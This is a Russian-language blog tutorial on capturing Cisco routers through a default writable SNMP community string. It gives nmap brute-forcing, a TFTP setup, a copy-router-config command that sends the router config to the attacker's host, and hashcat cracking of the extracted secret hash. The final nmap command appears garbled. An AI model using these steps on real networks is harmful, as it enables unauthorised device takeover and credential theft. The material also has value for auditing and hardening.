Захват устройств Cisco через SNMP

Хайповый заголовочек, не так ли? ) Ну не каждое, разумеется, устройство, можно захватить, но я приведу реально рабочий кейс, который может иметь место быть даже у вас в компании.

Суть атаки

Прикол весь в том, что зачастую можно встретить устройство Cisco с SNMP-комьюнити со стандартным именем и правами на запись. Как правило это строка “private”.

Посмотрим. Я заведомо разведал уже, что по IP адресу 192.168.0.130 находится роутер Cisco. Пока это всё, что мне известно.

# nmap -p161 -sU -sV 192.168.0.130

Функционирует SNMP – Simple Network Management Protocol. Мы ранее уже иногда с ним работали, занятная вещица. Управление в старых версиях осуществляется с использованием так называемого community-string – некий аналог пароля, который посылается в открытом виде. Типовые CS – public – для чтения и private для записи. Посмотрим, что имеется. Запустим скрипт перечисления популярных CS.

# nmap -sU -p161 --script snmp-brute 192.168.0.130

Типовая конфигурация. Чтож.

Теперь выкачаем конфиг с Cisco. Для этого нам надо запустить tftp-сервер на нашем узле и воспользоваться Perl-скриптом copy-router-config (в свежую Kali он уже входит).

# apt-get install tftpd-hpa
# /etc/init.d/tftpd-hpa start

TFTP-сервер работает несколько спецефично, поэтому подготовим ему каталог. По умолчанию он работает от пользователя tftp и рабочий каталог /srv/tftp

# touch /srv/tftp/1.txt
# chmod 777 /srv/tftp/1.txt
# chown -R tftp /srv/tftp

Подправим скрипт /usr/bin/copy-router-config.pl

Укажем имя файла 1.txt и путь в path – наш рабочий каталог.

Теперь выполним скрипт со следующими параметрами:

# copy-router-config.pl 192.168.0.130 192.168.0.101 private

0.101 – это адрес нашего узла, на котором запущен tftpd-сервер, а private – имя CS с соответствующими правами.

Как видим, в наш файл 1.txt залился конфиг Cisco-роутера.

Что делаем дальше?

# grep 'secret' 1.txt

Получаем хеш secret, который затем загоняем в hashcat на перебор:

Скорость не ахти, но есть возможность припахать карточку 2080 Ti, которая по некоторым хешам быстрее моей 1050 Ti в полтыщи раз ) надеюсь, на этом типе не хуже. Всё! После того, как пароль будет сбручен, считай, что железку мы захватили.

Способ 2

Пока я разбирался с Nmap, нашёл уже готовый скрипт! И не надо городить всё это было, достаточно просто сделать так:

# nmap -sU -p 161 --script-ios-config --script-args creds.enmp=:private 192.168.0.130

Интересно? Поделись с другом
Litl-Admin.ru

Comments:

Leave a Reply